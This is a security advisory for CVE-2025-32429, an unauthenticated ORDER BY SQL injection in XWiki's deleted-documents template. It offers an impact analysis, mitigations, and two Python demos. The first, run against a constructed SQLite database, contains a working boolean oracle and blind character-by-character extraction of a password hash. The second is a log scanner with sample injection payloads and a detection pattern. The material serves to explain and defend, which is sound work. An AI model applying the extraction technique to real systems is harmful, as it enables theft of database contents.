
CVE-2025-32429: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in xwiki xwiki-platform

Critical
Published: Thu Jul 24 2025 (07/24/2025, 22:22:35 UTC)
Source: CVE Database V5
Vendor/Project: xwiki
Product: xwiki-platform

Description

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, it's possible for anyone to inject SQL using the parameter sort of the getdeleteddocuments.vm. It's injected as is as an ORDER BY value. This is fixed in versions 16.10.6 and 17.3.0-rc-1.

AI-Powered Analysis

Last updated: 08/01/2025, 01:02:39 UTC

Technical Analysis

CVE-2025-32429 is a critical SQL injection vulnerability (CWE-89) in XWiki Platform, a widely used generic wiki platform that provides runtime services for applications built on top of it. It affects versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2.

The flaw is in the getdeleteddocuments.vm template, which lists deleted documents. The value of the 'sort' request parameter is inserted verbatim into the ORDER BY clause of the query that produces that list, with no validation against the set of sortable columns and no escaping, so any value the client supplies becomes part of the SQL statement.

An ORDER BY injection point behaves differently from one in a WHERE clause. The attacker usually cannot append a UNION to pull extra columns into the result, but ORDER BY accepts arbitrary expressions, so a conditional such as CASE WHEN (subquery) THEN column_a ELSE column_b END turns the row order into a boolean oracle and allows blind, character-by-character extraction of any data readable by the database account XWiki runs under. Data modification is only possible where the driver accepts stacked statements; confidentiality is the impact to plan for, with integrity and availability effects depending on the backend.

The CVE description states that anyone can reach the injection point, so exploitation requires neither authentication nor user interaction and is possible over the network. The CVSS 4.0 base score is 9.3 (critical), reflecting the high impact and the ease of exploitation. The issue is fixed in versions 16.10.6 and 17.3.0-rc-1. No exploits in the wild had been reported at the time of writing, but the low barrier to exploitation makes this a significant risk for affected deployments, and organizations running vulnerable versions should prioritize patching.
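The following is an added example, not XWiki's code, written in Python against an in-memory SQLite database to show why an unvalidated sort value in ORDER BY leaks data. The tables deleted_docs and users, the column names, the 'admin' row and its password_hash value are all constructed for the demonstration and are not XWiki's schema. The vulnerable function mirrors the bug class (the sort value concatenated as-is), the oracle shows how a CASE expression in ORDER BY flips the row order depending on a condition, extract_secret uses that flip to recover a string one character at a time, and the fixed function shows the allow-list approach that a column-name sort needs because ORDER BY identifiers cannot be bound as query parameters.

```python
import sqlite3


def build_db():
    """Constructed in-memory schema for the demo; not XWiki's real tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE deleted_docs(id INTEGER PRIMARY KEY, fullname TEXT,
                                  deleter TEXT, deleted_date TEXT);
        CREATE TABLE users(name TEXT, password_hash TEXT);
        INSERT INTO deleted_docs VALUES
            (1, 'Main.Archive',  'alice', '2025-01-03'),
            (2, 'Sandbox.Draft', 'bob',   '2025-01-01'),
            (3, 'Dev.Notes',     'carol', '2025-01-02');
        INSERT INTO users VALUES ('admin', 's3cr3t');
    """)
    return conn


def list_deleted_vulnerable(conn, sort):
    """Bug class of the advisory: the sort value is concatenated into ORDER BY
    verbatim, so it can be any SQL expression, not just a column name."""
    sql = "SELECT id FROM deleted_docs ORDER BY " + sort
    return [row[0] for row in conn.execute(sql)]


# Allow-list mapping from the externally visible sort key to a real column.
ALLOWED_SORT = {"id": "id", "fullname": "fullname",
                "deleter": "deleter", "date": "deleted_date"}


def list_deleted_fixed(conn, sort):
    """Hardened form: ORDER BY identifiers cannot be bound as parameters, so
    the request value is mapped onto an allow-list and the direction is
    restricted to asc/desc; anything else is rejected before any SQL is built."""
    key, _, direction = sort.strip().partition(" ")
    direction = direction.strip().lower() or "asc"
    if key not in ALLOWED_SORT or direction not in ("asc", "desc"):
        raise ValueError("invalid sort parameter")
    sql = f"SELECT id FROM deleted_docs ORDER BY {ALLOWED_SORT[key]} {direction}"
    return [row[0] for row in conn.execute(sql)]


def oracle(conn, condition):
    """Boolean oracle through ORDER BY: when the condition holds the rows come
    back as 1,2,3; otherwise the negated key reverses them to 3,2,1."""
    payload = f"CASE WHEN ({condition}) THEN id ELSE -id END"
    return list_deleted_vulnerable(conn, payload) == [1, 2, 3]


def extract_secret(conn, subquery, max_len=64):
    """Recover the string returned by `subquery` one character at a time,
    observing only the row order of the deleted-documents listing."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the secret has no character at this position.
        if not oracle(conn, f"length(({subquery})) >= {pos}"):
            break
        for code in range(32, 127):  # printable ASCII
            if oracle(conn, f"unicode(substr(({subquery}), {pos}, 1)) = {code}"):
                recovered += chr(code)
                break
        else:
            raise RuntimeError("character outside printable ASCII")
    return recovered


# Subquery the attacker smuggles in through the sort parameter (demo data).
ADMIN_HASH_SUBQUERY = "SELECT password_hash FROM users WHERE name = 'admin'"


if __name__ == "__main__":
    db = build_db()
    print(extract_secret(db, ADMIN_HASH_SUBQUERY))  # s3cr3t
    try:
        list_deleted_fixed(db, "CASE WHEN (1=1) THEN id ELSE -id END")
    except ValueError as exc:
        print("fixed version rejected payload:", exc)
```

Each oracle call is one request to the vulnerable listing; the whole secret is recovered from nothing but the order in which document ids appear, which is why an ORDER BY injection with no visible error and no UNION is still a full confidentiality break. Note that the fixed version never lets the request value reach the SQL text at all: it only selects from a fixed dictionary, which is the only robust fix for identifiers.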

Potential Impact

For European organizations, this vulnerability poses a substantial risk, especially those relying on XWiki Platform for internal knowledge management, documentation, or collaborative applications. Exploitation could lead to unauthorized data access, data manipulation, or disruption of wiki services, potentially exposing sensitive corporate information or intellectual property. Given that the vulnerability requires no authentication, attackers can remotely exploit it without prior access, increasing the risk of widespread attacks. The impact extends to confidentiality breaches, integrity violations through unauthorized data changes, and availability issues if the database or application becomes unstable due to malicious queries. Organizations in sectors such as finance, government, healthcare, and critical infrastructure, which often use wiki platforms for documentation and collaboration, could face regulatory and reputational damage if exploited. Additionally, the vulnerability could be leveraged as a foothold for further network compromise or lateral movement within enterprise environments.

Mitigation Recommendations

1. Upgrade to a fixed release: 16.10.6 or later on the 16.10.x line, or 17.3.0-rc-1 or later on the 17.x line. Note that 17.0.0-rc-1 through 17.2.2 are newer than 16.10.6 but still vulnerable, so "16.10.6 or later" alone is not a sufficient test.
2. If immediate patching is not feasible, add a web application firewall rule for the 'sort' parameter of requests that reach getdeleteddocuments.vm. A positive rule (accept only a bare column name, optionally followed by asc or desc) is more reliable than blocking SQL keywords, because an ORDER BY injection needs neither quotes nor a terminating comment and can be phrased with little more than parentheses and a subquery.
3. Audit all XWiki instances to identify vulnerable versions, and isolate or restrict access to affected systems until they are patched.
4. Review and harden database permissions so that the database account XWiki uses has only the privileges it needs; since the practical impact of an ORDER BY injection is blind read access, this bounds what can be extracted.
5. Monitor application and web server logs for 'sort' values containing parentheses, commas, SQL keywords such as CASE, SELECT or WHEN, or anything other than a column name and direction, and for bursts of near-identical requests to the deleted-documents listing that differ only in that parameter, which is the signature of character-by-character extraction.
6. Educate development and operations teams on secure query construction in custom extensions and integrations. Parameterized queries cover values but not identifiers: a column name or sort direction in ORDER BY cannot be bound as a parameter and must be mapped onto an allow-list instead.
7. Consider deploying runtime application self-protection (RASP) solutions that can detect and block SQL injection attempts in real time.
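As an added example of the log monitoring and the positive WAF rule described above (this is not XWiki's code or an official rule), the following Python scans web server access log lines in the common combined format, picks out requests whose path mentions the getdeleteddocuments template, URL-decodes their 'sort' parameter, and flags any value that is not a plain column name with an optional asc/desc. The log lines, client addresses and request paths are constructed for the demonstration; the path shape is an assumption about how the template might be reached, not XWiki's documented URL.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format (not real traffic). The
# request paths are an assumption about how the template could be reached.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jul/2025:22:30:01 +0000] "GET /xwiki/bin/view/Main/?xpage=getdeleteddocuments&sort=date HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Jul/2025:22:30:02 +0000] "GET /xwiki/bin/view/Main/?xpage=getdeleteddocuments&sort=fullname+desc HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Jul/2025:22:30:40 +0000] "GET /xwiki/bin/view/Main/WebHome?sort=CASE HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Jul/2025:22:31:14 +0000] "GET /xwiki/bin/view/Main/?xpage=getdeleteddocuments&sort=CASE%20WHEN%20(1%3D1)%20THEN%20id%20ELSE%20date%20END HTTP/1.1" 200 1832 "-" "curl/8.0"
198.51.100.7 - - [24/Jul/2025:22:31:15 +0000] "GET /xwiki/bin/view/Main/?xpage=getdeleteddocuments&sort=id%2C(SELECT%20count(*)%20FROM%20users) HTTP/1.1" 200 1832 "-" "curl/8.0"
"""

# Combined log format: client, identd, user, timestamp, request, status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Positive rule: a column name (letters, digits, underscore, dots for
# qualified names) optionally followed by asc or desc. Anything else is
# not a legitimate sort key and is treated as an injection attempt.
SAFE_SORT = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*(\s+(asc|desc))?$', re.IGNORECASE)

TEMPLATE_MARKER = "getdeleteddocuments"


def parse_line(line):
    """Return the parsed fields of one access log line, or None if it does
    not match the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_safe_sort(value):
    """True if the decoded sort value would pass the allow-list rule."""
    return SAFE_SORT.match(value) is not None


def suspicious_sorts(log_text):
    """Return (client ip, timestamp, decoded sort value) for every request to
    the deleted-documents template whose sort parameter fails the rule."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        target = fields["target"]
        if TEMPLATE_MARKER not in target.lower():
            continue  # other pages are out of scope for this check
        query = parse_qs(urlsplit(target).query)  # decodes %XX and '+'
        for value in query.get("sort", []):
            if not is_safe_sort(value):
                hits.append((fields["ip"], fields["ts"], value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_sorts(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious sort: {value!r}")
```

The same SAFE_SORT pattern can serve as the positive-security WAF rule from item 2: accept a request to the template only when the decoded sort value matches it. Decoding before matching matters, since the payloads arrive percent-encoded and a rule applied to the raw query string would miss them.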


Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2025-04-08T10:54:58.367Z
Cvss Version
4.0
State
PUBLISHED

Threat ID: 6882b80ead5a09ad00464500

Added to database: 7/24/2025, 10:47:42 PM

Last enriched: 8/1/2025, 1:02:39 AM

Last updated: 9/8/2025, 7:56:41 AM
